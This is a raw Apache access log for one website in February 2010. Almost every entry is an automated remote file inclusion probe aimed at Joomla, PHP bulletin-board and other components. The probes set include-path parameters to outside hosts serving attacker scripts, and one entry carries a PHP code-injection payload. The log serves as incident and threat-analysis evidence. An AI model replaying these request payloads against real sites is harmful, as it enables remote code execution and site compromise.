80.97.64.32 - - [18/Feb/2010:06:42:50 -0800] "GET /logs/access_100119.log%20%20//skin/zero_vote/error.php?dir=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:06:46:21 -0800] "GET /logs/access_100116.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:06:47:11 -0800] "GET /logs/access_100105.log//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:06:47:44 -0800] "GET /logs/access_100112.log/e404.php?DOCUMENT_ROOT=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:06:47:45 -0800] "GET /logs/access_100103.log/e404.php?DOCUMENT_ROOT=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:06:48:25 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:06:48:25 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:06:48:26 -0800] "GET /logs/access_100121.log%20%20//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:06:50:47 -0800] "GET /components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:06:50:47 -0800] "GET /logs//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:06:50:47 -0800] "GET /logs/access_100115.log//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:06:51:54 -0800] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:06:51:54 -0800] "GET /logs///components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:06:51:54 -0800] "GET /logs/access_100123.log%20%20///components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:06:51:58 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:06:51:58 -0800] "GET /logs/access_100125.log%20%20//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:06:51:58 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:06:52:30 -0800] "GET /logs/access_100122.log//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:06:52:30 -0800] "GET /logs/access_100205.log//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:06:52:34 -0800] "GET /logs/access_100111.log%20%20//delete_all.php?board_skin_path=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:06:52:34 -0800] "GET /logs//delete_all.php?board_skin_path=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:06:52:34 -0800] "GET /delete_all.php?board_skin_path=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:06:52:52 -0800] "GET /logs///components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:06:52:52 -0800] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:06:52:52 -0800] "GET /logs/access_100123.log%20%20///components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:53:45 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:53:47 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:06:53:49 -0800] "GET /logs/access_100121.log%20%20//bbs/write_update.php?board_skin_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [18/Feb/2010:06:55:23 -0800] "GET /logs/access_100121.log%20%20//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.61.244.6 - - [18/Feb/2010:06:55:23 -0800] "GET /logs//adminhead.php?path[docroot]=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
209.61.244.6 - - [18/Feb/2010:06:55:23 -0800] "GET /adminhead.php?path[docroot]=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:06:55:25 -0800] "GET /logs/access_100208.log%20%20//includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:06:55:25 -0800] "GET /logs//includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:06:55:25 -0800] "GET /includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:06:55:59 -0800] "GET /includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:06:55:59 -0800] "GET /logs//includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:06:55:59 -0800] "GET /logs/access_100208.log%20%20//includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [18/Feb/2010:06:56:55 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.difatta.it/logs/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:06:57:15 -0800] "GET /logs/access_100122.log//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:06:57:15 -0800] "GET /logs/access_100205.log//?index.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [18/Feb/2010:07:00:01 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.difatta.it/logs/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [18/Feb/2010:07:00:55 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "www.puaga.com"
38.101.148.126 - - [18/Feb/2010:07:00:55 -0800] "GET /ideal/forum/viewtopic.php?p=33243 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:07:02:43 -0800] "GET /logs/access_100127.log//includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:07:03:27 -0800] "GET /logs/access_100125.log%20%20//bbs/write_update.php?board_skin_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:07:03:27 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:07:03:27 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:07:03:31 -0800] "GET /logs/access_100208.log//includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [18/Feb/2010:07:03:41 -0800] "GET /logs/access_100127.log//includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.beautycnc.com/bbs/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:07:05:18 -0800] "GET /logs/access_100115.log%20%20//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:07:05:18 -0800] "GET /logs//components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:07:05:18 -0800] "GET /components/com_sef/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:07:05:42 -0800] "GET /logs/access_100112.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:07:05:42 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:07:05:44 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:07:05:49 -0800] "GET /logs/access_100201.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:07:07:46 -0800] "GET /logs/access_100112.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:07:07:46 -0800] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:07:07:47 -0800] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:07:07:50 -0800] "GET /logs/access_100201.log%20%20//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.cipam.com/templates/css/.psy/lang/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [18/Feb/2010:07:07:57 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [18/Feb/2010:07:07:58 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [18/Feb/2010:07:07:58 -0800] "GET /logs/access_100205.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:07:08:03 -0800] "GET /logs/access_100205.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:07:08:03 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:07:08:03 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:07:08:05 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:07:08:05 -0800] "GET /logs/access_100205.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:07:08:05 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [18/Feb/2010:07:08:13 -0800] "GET /logs/access_100205.log//?index.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [18/Feb/2010:07:08:13 -0800] "GET /logs/access_100122.log//?index.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:07:08:23 -0800] "GET /logs/access_100205.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:07:08:23 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:07:08:26 -0800] "GET /logs/access_100105.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:07:08:27 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:07:08:27 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:07:08:27 -0800] "GET /logs/access_100210.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:07:08:29 -0800] "GET /logs/access_100105.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [18/Feb/2010:07:08:35 -0800] "GET /logs/access_100208.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [18/Feb/2010:07:08:47 -0800] "GET /logs/access_100105.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:07:09:33 -0800] "GET /logs/access_100119.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:07:09:33 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.192.139.164 - - [18/Feb/2010:07:09:33 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:07:10:01 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:07:10:01 -0800] "GET /logs/access_100119.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:07:10:01 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:07:10:11 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:07:10:11 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:07:10:11 -0800] "GET /logs/access_100119.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:07:10:19 -0800] "GET /index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:07:10:19 -0800] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.243.44 - - [18/Feb/2010:07:10:19 -0800] "GET /logs/access_100119.log%20%20//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:10:42 -0800] "GET /logs/access_100111.log//administrator/components/com_sh404sef/admin.sh404sef.php?include_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:10:42 -0800] "GET /administrator/components/com_sh404sef/admin.sh404sef.php?include_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:10:42 -0800] "GET /logs//administrator/components/com_sh404sef/admin.sh404sef.php?include_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:10:43 -0800] "GET /logs//administrator/components/com_sh404sef/admin.sh404sef.php?include_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:10:43 -0800] "GET /logs/access_100111.log//administrator/components/com_sh404sef/admin.sh404sef.php?include_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:10:43 -0800] "GET /administrator/components/com_sh404sef/admin.sh404sef.php?include_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:10:45 -0800] "GET /logs/access_100111.log//administrator/components/com_sh404sef/admin.sh404sef.php?include_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:10:46 -0800] "GET /logs//administrator/components/com_sh404sef/admin.sh404sef.php?include_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [18/Feb/2010:07:10:46 -0800] "GET /administrator/components/com_sh404sef/admin.sh404sef.php?include_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:07:11:12 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:07:11:12 -0800] "GET /logs/access_100111.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:07:11:12 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [18/Feb/2010:07:12:22 -0800] "GET /logs/access_100103.log//?_SERVER[DOCUMENT_ROOT]=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:07:12:34 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:07:12:34 -0800] "GET /logs/access_100111.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:07:12:34 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:07:13:04 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:07:13:04 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:07:13:04 -0800] "GET /logs/access_100121.log%20%20//bbs/write_update.php?board_skin_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:07:13:18 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:07:13:18 -0800] "GET /logs/access_100111.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:07:13:18 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
